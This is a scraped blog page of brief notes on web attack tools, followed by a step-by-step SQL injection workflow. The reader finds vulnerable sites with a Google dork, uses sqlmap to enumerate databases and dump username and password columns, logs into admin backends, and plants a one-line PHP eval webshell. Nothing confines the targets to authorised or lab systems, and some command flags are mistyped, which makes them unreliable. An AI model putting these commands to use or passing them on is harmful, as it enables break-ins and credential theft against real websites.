sqlmap usage and blasting records

Language 2023-10-03 08:47:25 views: null

#Proxy interception tool
mitmproxy -p 8800 #Configure proxy

owasp-zap (attack proxy ZAP) is a comprehensive penetration testing tool
package for finding web application vulnerabilities. It includes interception proxy, automatic proxy, passive processing, brute force cracking, port scanning and spider search functions.

Burp Suite is an integrated platform for attacking web applications.
Proxy Burp Suite comes with a proxy that runs on the default port 8080. Use this proxy.

proxyStrike v2.1 proxy tool

webscarab agent software includes http proxy, web crawler, web spider, session ID analysis, automatic script interface, fuzz testing tool,
web format encoding/decoding, WEB service description language and SOAP parser and other functional modules. webScarab is based on the GNU protocol and is written in JAVA. It is one of the tools used in WEBGoat

Find test targets through google hack:
Search -> company inurl:asp?id=

1. Test the digital injection point
2. Disassemble the database and table name with sqlmap
3. Dump table data
4. Log in to the background

'
Read database version, current user, current database
sqlmap -u URL -f -b -current-dbs -curent-user -v 1

sqlmap -u URL --tables #List tables that may be attacked

sqlmap -u URL -T uname --columns #List useful columns

sqlmap -u URL -T uname - C login_name,pass,username --dump #-C specifies the column to be found, --dump 

SQL injection of a PHP site:
1. Test the numeric injection point
2. Sqlmap dismantles the database and table names
3. Dump table data
4. Use nikto to help find hidden directories
5. Use the hidden information in the web page code to find the management backend

sqlmap -u url --dbs --current-user    

sqlmap -u URL --dbs --dbms mysql -D cmxt --tables #cmxt is the database

sqlmap -u URL --dbs --dbms mysql --tables #Do not specify a database


sqlmap -u URL --dbs --dbms mysql -T admin -columns #View column results

sqlmap -u URL --dbs --dbms mysql -T admin -C user,pwd --dump #Query the value of a specific column

nikto -host primary domain name #Check the corresponding directory of the website to check for existing vulnerabilities.

fiddler :autoresponser returns the corresponding web page. To elevate authority.

<?php eval($_POST[x]);?> One sentence password

Guess you like

Origin blog.csdn.net/davice_li/article/details/131792290
Recommended
Ranking
Solve the problem that the Chinese display of the drawing using python matplotlib under the Linux system is displayed as a box
[Conference Call for Papers] The 5th International Conference on Civil Engineering, Environmental Resources and Energy Materials (CCESEM 2023)
4-yl Fast Fourier Transform
DataGirdView interlaced display color
[Docker implements test deployment CI/CD----Dingding alarm after the build is successful (7)]
[Asp.net core series] 6 the complete structure of a project in actual combat
The new version of OpenCenterV3 management background
Why can box plots detect outliers and what is the principle?
[Switch] jumbo frame Introduction
C++对象移动(3)——移动构造函数
Daily
More
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)

Code World

© 2018 codetd.com